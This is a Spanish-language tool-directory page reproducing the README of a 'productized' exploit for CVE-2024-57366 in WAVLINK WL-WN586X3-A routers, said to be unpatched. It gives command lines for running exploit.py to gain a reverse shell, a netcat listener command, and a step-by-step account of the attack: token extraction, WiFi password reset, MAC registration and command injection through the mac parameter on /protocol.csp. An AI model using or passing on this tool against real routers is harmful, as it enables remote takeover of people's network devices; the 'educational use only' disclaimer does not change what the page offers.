Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-57366 — Exploit productizado para CVE-2024-57366 en routers WAVLINK WL-WN586X3-A (¡SIN PARCHEAR A LA FECHA DE ESTA VERSIÓN!) | Kitploit
Herramientas/GitHubGitHub/h4ckusaur/cve-2024-57366
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad InalámbricaPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

Exploit productizado para CVE-2024-57366 en routers WAVLINK WL-WN586X3-A (¡SIN PARCHEAR A LA FECHA DE ESTA VERSIÓN!)

hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2024-57366 Exploit

Un exploit robusto para CVE-2024-57366 que permite la ejecución remota de código en routers vulnerables mediante la omisión de validación de direcciones MAC e inyección de comandos.

Este es un exploit posterior a la autorización que requiere que la función "Remote Control" del router esté activada, así como la contraseña administrativa. El nombre de usuario administrativo está codificado como "admin".

🚀 Features

  • Registro automático de direcciones MAC - Se conecta al WiFi para registrar la dirección MAC en el router
  • Exploit que preserva la red - Mantiene tus conexiones de red existentes durante el exploit
  • Caché de direcciones MAC - Repetición rápida de exploits usando direcciones MAC exitosas almacenadas en caché
  • Compatible con BurpSuite - Coincide exactamente con el formato de solicitud para máxima fiabilidad
  • Gestión de tiempos de espera - Mensajes útiles cuando se esperan conexiones de reverse shell
  • Fácil de usar - Caché de direcciones MAC simple basada en texto para una fácil gestión

📋 Requisitos

  • Python 3.6+
  • Sistema Linux con adaptador inalámbrico
  • Acceso sudo (requerido para la gestión de interfaces de red)
  • Router objetivo vulnerable a CVE-2024-57366

🛠️ Instalación

  1. Clona o descarga los archivos del exploit
  2. Asegúrate de tener los paquetes de Python requeridos:
    root@kitploit:~
    pip3 install requests
    

🎯 Uso

Exploit Básico (Primera Vez)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

Exploit Rápido (Usando MAC en Caché)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Script will ask: "Use cached MAC for quick exploit? (y/n):" - say "y"

Forzar Exploit Completo (Omitir Caché)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

Listar Direcciones MAC en Caché

root@kitploit:~
python3 exploit.py --list-cached

📖 Opciones de Línea de Comandos

  • --target - Dirección IP del router objetivo (por defecto: 127.0.0.1)
  • --port - Puerto del router objetivo (por defecto: 80)
  • --local-ip - Tu dirección IP local para la conexión de reverse shell
  • --local-port - Puerto local para la conexión de reverse shell (por defecto: 4444)
  • --password - Contraseña de administrador del router
  • --ssid - Nombre de la red WiFi (por defecto: WAVLINK-Mesh_DC4B)
  • --force-full - Forzar el exploit completo, omitir la comprobación de MAC en caché
  • --list-cached - Listar las direcciones MAC en caché y salir

🔧 Cómo Funciona

Resumen Técnico

CVE-2024-57366 explota una omisión en la validación de direcciones MAC en el firmware del router. La vulnerabilidad permite la inyección de comandos a través del parámetro mac en el endpoint /protocol.csp.

Proceso del Exploit

  1. Autenticación - Extrae el token de autenticación del router
  2. Restablecimiento de la contraseña WiFi - Restablece la contraseña WiFi del router para que coincida con la contraseña de administrador
  3. Registro de MAC - Se conecta al WiFi para registrar la dirección MAC en el router
  4. Inyección de comandos - Inyecta el payload de reverse shell usando la MAC registrada
  5. Preservación de red - Mantiene las conexiones de red existentes durante todo el proceso

Detalles Técnicos Clave

  • Omisión de validación de MAC: El router valida las direcciones MAC comprobando si se han conectado al WiFi
  • Vinculación de interfaz de red: Utiliza la interfaz eth0 para preservar el contexto de red original
  • Formato de solicitud: Coincide exactamente con el formato de BurpSuite (index=1, token en la ruta URL)
  • Payload: Reverse shell con Netcat y named pipe para mayor fiabilidad

Caché de Direcciones MAC

El exploit almacena automáticamente en caché las direcciones MAC exitosas en successful_macs.txt:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

Adición manual de MAC: Edita successful_macs.txt y añade líneas como:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 Ejemplo de Uso

Primer Intento de Exploit

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# When prompted to save MAC address, say "y"

Exploits Posteriores (Mucho Más Rápidos)

root@kitploit:~
# Start netcat listener
nc -lvp 4444

# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Say "y" when asked about using cached MAC

🔍 Solución de Problemas

Problemas Comunes

  1. "No se encontraron adaptadores inalámbricos"

    • Asegúrate de tener un adaptador inalámbrico habilitado
    • Comprueba que el WiFi esté encendido
    • Prueba a ejecutarlo con sudo
  2. "La validación de la dirección MAC falló"

    • La dirección MAC debe estar registrada en el router
    • Asegúrate de que el paso de conexión WiFi se completó correctamente
    • Prueba primero a conectarte al WiFi manualmente
  3. "La solicitud agotó el tiempo de espera"

    • ¡Esto podría significar que el exploit funcionó!
    • Revisa tu listener de netcat para ver si hay una conexión de reverse shell
    • El router podría estar ejecutando el comando pero sin responder a HTTP
  4. "La reverse shell no conecta"

    • Verifica que tu --local-ip sea correcta (usa ip addr show eth0)
    • Asegúrate de que no haya un firewall bloqueando la conexión
    • Comprueba que el listener de netcat esté ejecutándose en el puerto correcto

Requisitos de Red

  • Interfaz eth0: Debe tener una dirección IP para la preservación de red
  • Adaptador inalámbrico: Requerido para el registro inicial de MAC
  • Acceso al router: Debe poder alcanzar el router a través de la interfaz eth0

📁 Estructura de Archivos

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Main exploit script
├── successful_macs.txt     # MAC address cache (auto-generated)
└── README.md              # This file

⚠️ Descargo de Responsabilidad

Esta herramienta es solo para fines educativos y de pruebas autorizadas. Úsala únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba. Los autores no son responsables del mal uso de esta herramienta.

🔗 Referencias

  • CVE-2024-57366
  • Vulnerabilidad en el firmware del router en la validación de direcciones MAC
  • Inyección de comandos a través del endpoint /protocol.csp

📝 Licencia

Este proyecto se proporciona tal cual con fines educativos. Úsalo de forma responsable y de acuerdo con las leyes y regulaciones aplicables.

Descargar herramienta